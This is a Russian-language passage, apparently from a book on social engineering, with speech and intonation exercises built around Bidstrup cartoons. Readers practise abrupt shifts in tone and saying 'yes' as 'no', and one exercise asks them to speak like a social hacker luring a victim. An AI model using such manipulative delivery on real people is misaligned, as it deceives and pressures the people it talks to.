ссу­тулив пле­чи, ус­та­вив свой взгляд где-то в се­реди­ну гру­ди ва­шего со­бесед­ни­ка. И пос­ле сло­ва "про­шу", — рез­кая сме­на то­наль­нос­ти!, — и вто­рую часть фра­зы про­из­но­сим мак­си­маль­но жес­тко, рез­ко, впе­чаты­вая сло­ва в Са­шу, пле­чи рас­пра­вили, стой­ка бо­евая, взгляд, чуть ис­подлобья — пря­мо в гла­за или пе­рено­сицу. Выг­ля­деть это бу­дет при­мер­но так. "С-саш… П-по­жалус­та. Я т-те­бя очень п-про­шу НИ­КОГ­ДА. ТАК. БОЛЬ­ШЕ. НЕ ДЕ­ЛАЙ!".

Уме­ние го­ворить — это очень важ­но. При­чем го­ворить не так, как вы обыч­но го­вори­те, а так, как то­го тре­бу­ет си­ту­ация. Прос­тое уп­ражне­ние для на­чала. Поп­ро­буй­те ска­зать "Да" как "Нет", а "Нет" как "Да". По­лучи­лось? А те­перь поп­ро­буй­те ска­зать "Да", как это ска­зал бы: Анек­дот в те­му — Штир­лиц! Я знаю, что вы вре­те. Но по­чему-то я вам ве­рю. • пыл­кий воз­люблен­ный, ко­торо­го его лю­бимая под­ру­га спро­сила, хо­чет ли он с ней про­вес­ти ос­та­ток ве­чера…; • ни­кому не мо­гущий от­ка­зать че­ловек, ко­торый кро­ме "Да" ни­чего го­ворить не уме­ет (Ну, ко­неч­но, д-д-а-а-да); • ис­те­рич­ная жен­щи­на (вон от­сю­ДА­ААА­АА!!!). А "Нет" ска­жите как: • ко­кет­ли­вая де­вуш­ка, ко­торая хо­чет ска­зать "Да", но ей это­го не поз­во­ля­ют мо­раль­ные ус­тои; • пь­яный пра­пор­щик; • трез­вый трак­то­рист, ко­торый уже го­товит­ся вы­пить, но пред­ло­жение об этом пос­ту­пило рань­ше окон­ча­ния ра­боче­го дня; • пот­ря­сен­ный чем-то че­ловек (Нет, толь­ко не это…); • уби­тый го­рем кро­кодил; • иг­ри­вая так­са. И так да­лее… А те­перь пот­ре­нируй­тесь го­ворить так, как по­каза­но на сле­ду­ющих ка­рика­турах X. Бидс­тру­па (ка­рика­тура "Ма­нера го­ворить"). 1. Вот так. Как стар­ший сер­жант, ко­торый прос­то впе­чаты­ва­ет свои сло­ва в со­бесед­ни­ка (рис. 5.1). Рис. 5.1. Фраг­мент ка­рика­туры X. Бидс­тру­па "Ма­нера го­ворить" 2. Или вот так. Как пол­ковник с про­винив­шимся ка­пита­ном (рис. 5.2). На этом ос­та­вим ар­мию и пе­рей­дем к дру­гим при­мерам. 3. По­гово­рите так, как го­ворил бы опыт­ный ло­велас, соб­лазня­ющий свою оче­ред­ную пас­сию (рис. 5.3). 4. А те­перь по­гово­рите как со­ци­аль­ный ха­кер, за­мани­ва­ющий в свою па­ути­ну оче­ред­ную жер­тву (рис. 5.4). 5. Или как ора­тор, "за­тума­нива­ющий" моз­ги а­уди­тории (рис. 5.5). Рис. 5.2. Фраг­мент ка­рика­туры X. Бидс­тру­па "Ма­нера го­ворить" Рис. 5.3. Фраг­мент ка­рика­туры X. Бидс­тру­па "Ма­нера го­ворить"